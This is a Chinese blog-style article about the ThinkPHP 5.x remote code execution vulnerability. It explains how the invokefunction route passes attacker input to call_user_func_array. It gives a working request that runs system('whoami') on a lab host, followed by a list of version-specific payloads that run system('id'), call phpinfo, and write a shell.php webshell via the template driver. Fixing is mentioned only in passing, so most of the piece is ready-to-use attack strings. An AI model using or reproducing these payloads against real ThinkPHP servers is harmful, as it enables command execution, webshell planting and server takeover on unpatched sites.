thinkphp代码执行getshell的漏洞解决
先来简单说说前天thinkphp官方修复的一个getshell漏洞,框架对控制器没有进行足够的检测导致的一处getshell
影响的范围: 5.x < 5.1.31, <= 5.0.23
漏洞危害: 导致系统被提权(你懂的)
这里附上一个自己测试的 thinkphp的 链接 http://www.thinkphp.cn/download/1260.html 版本是5.0.22
先来讲下,5.0 跟5.1的区别吧,tp5.1中引入了容器(container)和门面(facade)这两个新的类 tp5.0是没有这两个新的类的,
漏洞原理
url:http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction
我们先来看看app类里的 exec函数里的执行分层控制器的操作
我们这里是把controller 的调用信息跟配置信息全部传到了 invokefunction 这个 执行函数里面去了
因为think\app是第二个入口,在tp运行的时候就会被加载 所以用think\app里面的分层控制器的执行操作的时候,需要去调用invokefunction这个函数。
这个函数有两个参数,如上图所示,第一个是函数的名字,第二个参数数组,比如$function传入baidu然后$vars传入[12,555]就相当于调用baidu(12,555)
此处我们把function传入call_user_func_array然后vars[0]传入我们要执行的函数的名字vars[1]传入要执行函数的参数,因为vars是个数组 所以此处我们的get请求需要这样写
vars[]=函数名&vars[1][]=参数
此处是利用php的数组注入
此时此刻就可以开始利用远程代码执行漏洞了 比如我们要执行system函数 他的参数是whoami
http://192.168.188.141/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
下面你懂的,作为一个接班人我们要做的就是修复他(为所欲为?),当然官方更新的最新版本是已经修复了的
这里就代码执行成功,以下奉献上tp不同版本的payload
?s=index/\think\request/input&filter=phpinfo&data=1 ?s=index/\think\request/input&filter=system&data=id ?s=index/\think\template\driver\file/write&cachefile=shell.php&content= ?s=index/\think\view\driver\php/display&content= ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id ?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 ?s=index/\think\container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持。
上一篇: 动态加解密技术详解(图)
推荐阅读
-
ThinkPHP框架任意代码执行漏洞的利用及其修复方法
-
解决ie11 SCRIPT5011:不能执行已释放Script的代码问题
-
thinkphp 漏洞修复方案之6.X版本的代码漏洞案例分析
-
python3编写ThinkPHP命令执行Getshell的方法
-
ThinkPHP控制器里javascript代码不能执行的解决方法
-
Visual FoxPro的vfp6r.dll ActiveX 代码执行漏洞
-
Thinkphp 2.x、3.0-3.1版代码执行漏洞分析复现
-
Thinkphp2.x 任意代码执行漏洞
-
ThinkPHP framework 任意代码执行漏洞预警
-
ThinkPHP框架任意代码执行漏洞的利用及其修复方法